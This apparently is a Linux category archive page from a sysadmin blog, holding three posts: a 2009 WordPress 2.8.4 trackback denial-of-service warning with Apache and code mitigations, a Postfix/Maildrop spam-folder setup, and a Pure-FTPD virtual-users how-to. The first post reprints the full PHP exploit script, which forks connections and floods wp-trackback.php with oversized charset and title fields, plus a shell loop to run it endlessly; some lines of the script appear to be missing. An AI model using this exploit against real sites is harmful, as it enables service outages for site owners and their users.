Archive for category Linux

New 0-Day WordPress 2.8.4 Exploit

WordPress is vulnerable to a very dirty exploit right now as of 2.8.4. There’s a resource exhaustion DoS that is floating around the public right now. It’s a vulnerability in wp-trackbacks.php that hurts.

Here’s the results from a quick test against my server:

13:30:29 up 36 days, 1:06, 12 users, load average: 45.06, 17.11, 6.24

Very dirty.

Here’s a temporary fix that can be implemented until we get a real patch.

Add the following lines to your Apache 2 config file:
<Files ~ "wp-trackback.php">
Order allow,deny
Deny from all

This should be placed in the main config, not a virtual hosts config. This will disable any URLs with “wp-trackback.php” in it. This is a quick and ugly fix, but will help against this attack.

I expect WordPress will have an update soon.

UPDATE: With the help of a friend we have created a quick fix:

In line #47 of wp-trackback.php, add this:

if(strlen($charset) > 50)

Here’s the actual exploit.

* wordpress Resource exhaustion Exploit
* [email protected] contacted and get a response,
* but no solution available.
* [18/10/2009 20:31:00] modified by Zerial <[email protected]>
* exploiting:
* you must install php-cli (command line interface)
* $ while /bin/true; do php wp-trackbacks_dos.php; done
if(count($argv) < 2)
die("You need to specify a url to attack\n");
$url = $argv[1];
$data = parse_url($url);
if(count($data) < 2)
die("The url should have http:// in front of it, and should be complete.\n");
$path = (count($data)==2)?"":$data['path'];
$path = trim($path,'/').'/wp-trackback.php';
if($path{0} != '/')
$path = '/'.$path;
$b = ""; $b = str_pad($b,140000,'ABCEDFG').utf8_encode($b);
$charset = "";
$charset = str_pad($charset,140000,"UTF-8,");
$str = 'charset='.urlencode($charset);
$str .= '&';
$str .= '&title='.$b;
$str .= '&blog_name=lol';
$str .= '&excerpt=lol';
for($n = 0; $n <= 5; $n++){
$fp = @fsockopen($data['host'],80);
die("unable to connect to: ".$data['host']."\n");
$pid[$n] = pcntl_fork();
fputs($fp, "POST $path HTTP/1.1\r\n");
fputs($fp, "Host: ".$data['host']."\r\n");
fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
fputs($fp, "Content-length: ".strlen($str)."\r\n");
fputs($fp, "Connection: close\r\n\r\n");
fputs($fp, $str."\r\n\r\n");
echo "hit!\n";

, , ,


Postfix Maildrop Spam Folder

Filtering spam in Postfix is pretty simple.  There’s some advanced techniques you can use, but simply setting up Spamassassin will suit many people.  One downside is seeing all the ***** SPAM ***** mails in your inbox.  It took a while to come up with a solution, but the best fit so far has been implementing Maildrop to automatically move those files to a Junk folder.  Here’s the steps to set this up on a Debian 5.0 system with Postfix and Spamassassin.

First, setup your /etc/maildroprc file:

# commands and variables for making the mail directories

# make the user's mail directory if it doesn't exist
`test -e $MAILDIR`
if ($RETURNCODE != 0)
`$mkdir -p $MAILDIR`
`$rmdir $MAILDIR`
`$maildirmake $MAILDIR`

# make the .Junk folder if it doesn't exist
`test -d $_JUNK_DEST`
if ($RETURNCODE != 0 )
`$maildirmake $_JUNK_DEST`
#auto subscribe. the following works for courier-imap
`echo INBOX.Junk >> $MAILDIR/courierimapsubscribed`

# If the Spam-Flag is set, move the mail to the Junk folder
if (/^X-Spam-Flag:.*YES/)
exception {
to $DEFAULT/.Junk/

The comments clearly state what’s going on there.

Once that’s setup, you will go into your /etc/postfix/ and make sure the

maildrop  unix  -       n       n       -       -       pipe
  flags=DRhu user=vmail argv=/usr/bin/maildrop -d ${recipient}

is not commented out.

Next you will have to set the /usr/bin/maildrop file setuid root. This is so maildrop can interact with authdaemon and the mail folders.

#chmod +s /usr/bin/maildrop

Then you have to add this to your /etc/postfix/ file:

virtual_transport = maildrop
maildrop_destination_recipient_limit = 1

If there is another virtual_transport line, be sure to comment that out first.

Last, set the permissions on the authdaemon so that maildrop can access it.

chown vmail /var/run/courier/authdaemon

And that’s all. Nice and simple way to handle all that Junk mail.

, , ,


Debian Pure-FTPD Virtual Users Howto

After being a dedicated Gentoo user, I’ve recently moved over to Debian.  Hoping to work more on productive tasks, than just administrating my servers.  In the switch I had to configure Pure-FTPD to use virtual users, and the config files are quite a bit different than Gentoo.

I thought I’d write up a quick how to on how to configure Pure-FTPD with virtual users in Debian, as sort of a personal reference, and in hope someone else will be able to put it to use.  And here we go..

Enable PureDB authentication:

# cd /etc/pure-ftpd/auth

# ln -s ../conf/PureDB 50pure

To disable PAM authentication and UNIX authentication so you only have virtual users:
# echo no > /etc/pure-ftpd/conf/PAMAuthentication

# echo no > /etc/pure-ftpd/conf/UnixAuthentication

That’s it.  Simple, but when coming from a single config file, this isn’t at all intuitive – at least to me.

I’ve always recommended Pure-FTPD for it’s security, features, and simplicity.  You can find out more information at the official Pure-FTPD projects website:

, , , ,